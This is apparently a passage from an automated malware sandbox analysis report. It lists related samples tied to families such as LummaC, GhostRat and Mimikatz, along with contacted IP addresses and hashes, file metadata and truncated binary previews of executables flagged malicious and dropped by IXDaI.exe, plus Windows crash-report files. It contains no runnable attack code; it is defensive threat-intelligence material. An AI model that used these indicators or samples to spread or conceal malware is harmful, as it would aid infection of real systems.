	611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe	Get hash	malicious	Bdaejec, PrivateLoader	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	qGJBgGtR7e.exe	Get hash	malicious	Gh0stCringe, GhostRat, Mimikatz, RunningRAT	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	VaajyQsbTV.exe	Get hash	malicious	GhostRat, Nitol	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	PXTCFXKM.exe	Get hash	malicious	LummaC	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	RQTMGXIK.msi	Get hash	malicious	LummaC	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	szw3yovpYg.exe	Get hash	malicious	Unknown	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3
	Snort_2_9_20_Installer.x64.exe	Get hash	malicious	LummaC	Browse	185.149.100.242 172.67.213.85 162.0.235.84 188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\B552.exe	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590500815826226
Encrypted:	false
SSDEEP:	384:1FlSCXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:4WQGPL4vzZq2o9W7GsxBbPr
MD5:	D73C7A6E2C4A5CAA52963BBAD35CAB0D
SHA1:	16D06FB454F2CD4DB1585FF02839B69BEC3FE92B
SHA-256:	1EF16CAB28E94237C2147BDC95D73894EA65084196D2503723F53218196062CF
SHA-512:	02DD2FDDFF33BB42FFA80AED12A95FB522B94A0CE72A186A226CD0E96D7C4785BCEA2B6168A15B5D3B431717A4B45C3A021B547842EDC9D308C4612135CAEFC4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.7313487472047075
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	748982C8BCB6E33E913FE772603F7431
SHA1:	B001A38DEB7A0E43A2C2554584DAA9EBC2F7CFA6
SHA-256:	22784E7A42A1FBD55DE3104A96B47BF3F37F57DE4340216E878F5FB4859EB9AC
SHA-512:	6701B531447446F53A9DC698829A080F357C24D59BE1385A7802F084597CF019D1C389F4497A989BB33A0738AFEA37436E3AC3533DBC83954C6FDC9014868729
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.3666323858786935
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdt7QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdt8GCq2iW7z
MD5:	A514B8D92B6F9302E675ADA4514DF9BF
SHA1:	523C7FEADB3E10822162045F87BE427CF5622DB7
SHA-256:	ACC821E8355FBBB9C64EAEDCF6516CB9D8788EC63E2BB43F17E18C785388B45D
SHA-512:	EB976A20E8BD3061D9B0F16B82E01DCA7B4A7BF8EDCDF28E5CF5FAD169BD4D9387E71CE45CCFA7D02DC64E3F5100F3F6C3F39B07D54C8B3FF5D4E4D4B582D311
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IXDaI.exe_608deba89d493f51917f2e2f2e64431295b61_d6b2a92d_a71deb28-b74a-4c69-9242-bcc348634ffa\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9851176340561906
Encrypted:	false
SSDEEP:	192:ZoVjb7HMEi0Wj3Hcj8/AmzuiFVZ24IO8QZ:0f7HMEpWj38jwzuiFVY4IO8QZ
MD5:	35A64AFB3EC2E3C16FADA5A7D84AA740
SHA1:	6F366103FA97B53BBF44459819F86D61163C778C
SHA-256:	5CF66A000128E189C8675212528F91D839974DBA9ABCCE4F03254E23E715DD51
SHA-512:	666BC5F757A0AC62815E34C550CF37C5A9E1306D2FE215DD012EFDB1D9B7DF5951C3CC5222FCA6CE33080A254476B2D9149F63128B43023E6948B6DCD746E2C0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.1.7.3.1.6.2.1.5.2.5.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.1.7.3.1.6.8.4.0.2.5.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.1.d.e.b.2.8.-.b.7.4.a.-.4.c.6.9.-.9.2.4.2.-.b.c.c.3.4.8.6.3.4.f.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.6.3.f.9.3.2.-.3.b.0.e.-.4.2.4.c.-.a.8.3.5.-.a.d.4.4.1.7.2.e.b.0.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.X.D.a.I...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.c.-.0.0.0.1.-.0.0.1.3.-.7.4.8.8.-.8.7.9.b.f.2.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.7.f.b.d.1.3.5.9.a.3.1.d.6.8.c.b.1.a.c.f.e.c.e.c.a.7.8.b.d.4.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.I.X.D.a.I...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lm.exe_c61e40594a1409babe66f8b377aac18216c95_5fe582ea_62e495da-7860-476e-93aa-32e866fd8ce5\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0173059562034197
Encrypted:	false
SSDEEP:	192:Yf6z3cdz0BU/rWnjukH6dzuiF4Z24IO8qqR:Q67OgBU/wjszuiF4Y4IO8J
MD5:	96A7B65996CE0F1FB8D854CA07747E6C
SHA1:	254275177010DA4230CD12638283B4602131B097
SHA-256:	EAF8FDBA5294EED693F936880DE3ED5422030E4005F25EEF12ED93F86BD623E4
SHA-512:	8C5585EF62D66A87378A639CD26B2F7E6F2CB98E7D6774B9FA693E4BB226924197B30C9C13AA648671C1BFC408A0F5A8F2589F5945596C2008C26C2C0290BF0D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.1.7.4.6.1.1.3.7.7.5.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.1.7.4.6.2.0.7.5.2.4.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.e.4.9.5.d.a.-.7.8.6.0.-.4.7.6.e.-.9.3.a.a.-.3.2.e.8.6.6.f.d.8.c.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.9.3.e.3.a.8.-.c.8.4.b.-.4.f.0.0.-.9.d.e.c.-.4.4.7.5.c.d.3.e.1.c.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.2.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.b.8.-.0.0.0.1.-.0.0.1.3.-.3.b.6.6.-.a.9.e.a.f.2.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.8.6.d.5.e.1.c.a.7.e.a.4.a.a.7.3.3.7.8.1.e.5.d.d.7.e.4.f.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.c.c.2.d.c.b.2.6.c.1.6.4.9.8.8.7.f.1.d.5.a.e.5.5.7.a.0.0.0.b.5.f.e.3.4.b.b.9.8.!.l.m...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vm.exe_cc123a61b5ef7992db71cfc53434ac4432f88368_19c5d0bb_2539ab57-2f04-406f-bc3c-3a4864c6ad7d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0575070067059151
Encrypted:	false
SSDEEP:	192:Cj5frU0BU/gjierlm7zuiF4Z24IO8qJa:g5frPBU/gjplczuiF4Y4IO8s
MD5:	FE7DD32A393DADB9F773EC3E62FA15E9
SHA1:	F0498F3AA836014421BB350380CB0EFB4EC6D840
SHA-256:	7F9105813DDF6C17732AF1886DC8220D66E751DE2425469717D0B85643D8F48E
SHA-512:	2F42CA4632A716799CAE80F6740C402F0515E22EAF313676807E597A9ECC420E3964379676795A547FCB82437C3F49E6908741E4EDDFB683A19A2AEC47340F4F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.1.7.4.5.6.4.2.8.7.4.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.1.7.4.5.7.6.7.9.6.6.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.3.9.a.b.5.7.-.2.f.0.4.-.4.0.6.f.-.b.c.3.c.-.3.a.4.8.6.4.c.6.a.d.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.d.5.c.a.e.a.-.3.4.4.a.-.4.5.2.8.-.8.5.b.9.-.e.9.e.a.a.3.b.9.0.6.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.2.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.0.-.0.0.0.1.-.0.0.1.3.-.b.f.2.f.-.0.3.f.4.f.2.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.8.6.d.5.e.1.c.a.7.e.a.4.a.a.7.3.3.7.8.1.e.5.d.d.7.e.4.f.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.c.c.2.d.c.b.2.6.c.1.6.4.9.8.8.7.f.1.d.5.a.e.5.5.7.a.0.0.0.b.5.f.e.3.4.b.b.9.8.!.v.m...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CE2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jul 24 17:55:16 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	164278
Entropy (8bit):	1.7818879829099237
Encrypted:	false
SSDEEP:	768:r+1vB9X8aeJsWsBowz2Vtg82/sifWS1SYM:a5qStsS1SYM
MD5:	847451280F065355C1FF68C56662E471
SHA1:	F774B82D50E22198EC40808857D6C26079197DC2
SHA-256:	D828847349068C4D8BA2EB47C76968389677B071EE5C4C58E7D64B0FF4509698
SHA-512:	0A0665C2D67DCAC7F3FDFBD24203B59118227FDA444EB53CDD5D513194468D486B1C0809A93C31D7410FDD093D107D5714CC41A6F79563FA40AB4D725CEF54EF
Malicious:	false
Preview:	MDMP..a..... ........@.f............t...............\|.......t...fQ..........T.......8...........T...........8<..~E.......... !...........#..............................................................................eJ.......#......GenuineIntel............T.......\....?.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E3B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8272
Entropy (8bit):	3.6995316867436774
Encrypted:	false
SSDEEP:	192:R6l7wVeJJc64F6Y7O66fgmfOPspDz89bODsf0Mam:R6lXJS666Yi6KgmfOFOofJ
MD5:	6473FF12BD42FB304373E52F76CF8A72
SHA1:	B2D0298E9BF6905684332125156514F774A8CE07
SHA-256:	503A8100C3E6153278B3D3CEE35D137348B75F3DB05B0A3F01514DAE5C7ED7E3
SHA-512:	0C0C065E325F7D59ECA452D3115EAD8203F0890F17CC175FF5E32CFF59EF0ABE27CED421DF0DAC0DC42DB574CC1E9E3DAFEEB3206E065834833983938BA4D95A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E6B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4544
Entropy (8bit):	4.451312661639546
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+Jg77aI9diWpW8VY0Ym8M4JaEFKu+q8sX3FahgjSydd:uIjf0I7jj7VMJyuF3Fig+ydd
MD5:	5440F4EBF27527E048E93C9C0CEBB963
SHA1:	34331774194F9439EE38DAB656A73A58692E3C1A
SHA-256:	AABB0002CEE7A1C2EA80B5751EDCD0E616687BFB90B80835EFCAD6C22E329ECE
SHA-512:	65CB813355D5A7FB14B51DBE56D7368989EA6DF7D32052D29B5A323418C9246E3CC2943C1F4086A82372D7053F5756BADF1FA2608847D87E749DF52C1A92596A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425337" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER506E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jul 24 17:57:36 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	252767
Entropy (8bit):	3.6873242753587125
Encrypted:	false
SSDEEP:	1536:8SRFjMoriazKhJuBojR/apN4uE2aOHSVXpELTgbd2slerzh/A9ihqLxsBWC9CDlp:8SRLrQ/c4uEqHy2LTg52sYJ54YJ3Bq
MD5:	197C95B5EE5FE7E0B328069F1E7E28FB
SHA1:	9B94B9CC114C9C667D3FA5515213BEDBDB71C6B1
SHA-256:	398206E5FD7F6480E47C8A3A04E60B4BD1FC797814D764EB1863415984FC8E0F
SHA-512:	678BD75A6A4C45E23ECA6A27AE60796832B6105FEF77C37770961F9556D968FE874971E20B95700654795FA12981ED69CB49A5BC246097A3242F4A273477E6A5
Malicious:	false
Preview:	MDMP..a..... ........@.f........................8................T..........T.......8...........T........... ,..?............ ..........."..............................................................................eJ......h#......GenuineIntel............T............@.f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5292.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6316
Entropy (8bit):	3.730159788406678
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbJ36pvsD3pMYADQE/HXw5aM4U3q89b3Tsf+bO9m:R6l7wVeJJ36pEDSYEgpra89b3TsfqO9m
MD5:	7977985FB9AD7365402016E86F98F9EA
SHA1:	A677DD9196EAD93F6C1FF566BD759594479D61CB
SHA-256:	55789461FBE9B8D2C896C72E8C030EC939AEAAF9C7483AFA841CEF60AE7D9615
SHA-512:	8ED0F983850B7A8C6CDE952E8F3880D27833800F8E136E75FF701FAFCA2644D862030D384E5AE8033F82CCC865073489CF3FE3F35D0CF1891ED4CA833A74CC76
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER52D2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4646
Entropy (8bit):	4.470900167492462
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg77aI9diWpW8VYnYm8M4JlD0cFl+q8t1oyyo43Cpd:uIjfyI7jj7VTJlt2Nyo4Spd
MD5:	3B02B26947F45A52F1958E5CAF340644
SHA1:	3A01289517978C5A5A5E3CA1E471DBE96CE83933
SHA-256:	F7F3492E6916EEAF5ADE87ACE6705489EA9276C675D3B4BDBF0573433119153E
SHA-512:	42F4A1A56250FF06BD3A2CE6F97CE215A887F39B9B04187174DFC6FC2616EAF078C97628F0695D75D985EF61A5648BCD140CEDF941FD738D76AB039E09886527
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER62CD.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 17:57:41 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	139198
Entropy (8bit):	2.1099278662545324
Encrypted:	false
SSDEEP:	768:ejoynz6mPeujffjmjZgKB/2FfaA7DzW6uyXDyU:qPEuKB/2FrfWIX+U
MD5:	F1A22CF8AF06B56C9BC741C0E49C89BD
SHA1:	217E30181C4751D82F88D5A2B057A48FCDD3C1FD
SHA-256:	20F54BD8AFBA8476E067BB330ABF27FF5811D8D25E9A4B3B0C98BB9DAEEB68A3
SHA-512:	1ACE86178C2B0D8C522951B27B6C7AA708710501CB83C13B31B7FB246F1CD003C78A7C809047045580204E1CD7B5332F070E5462B180D13AA7CB90B5A72B5E1E
Malicious:	false
Preview:	MDMP..a..... ........@.f........................\|...........,...d"......4....[..........`.......8...........T............F...............#..........\|%..............................................................................eJ.......&......GenuineIntel............T...........z@.f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63F7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6332
Entropy (8bit):	3.7286234020444384
Encrypted:	false
SSDEEP:	192:R6l7wVeJlZ6AZCWYxgpr9P89bmPsfcOCm:R6lXJL6AdYxfm0fci
MD5:	5A1D84C51B81AB0CA27C8338AE9ED74D
SHA1:	33784DFFE45A2DD84FD5998AD1C6AA10C91E9294
SHA-256:	6FA79DE616B2C74BDE369260340F122CEAD97A57FC82EBE925131338738766BF
SHA-512:	85A57C078EDE1233E61F2ED445028230E6235EEB1A543E078BA981B89C1507BA9C9BDCED5AFE40A9166F946EC6592F4D5EC0116AB61B1268FE0F043D3BDC8357
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 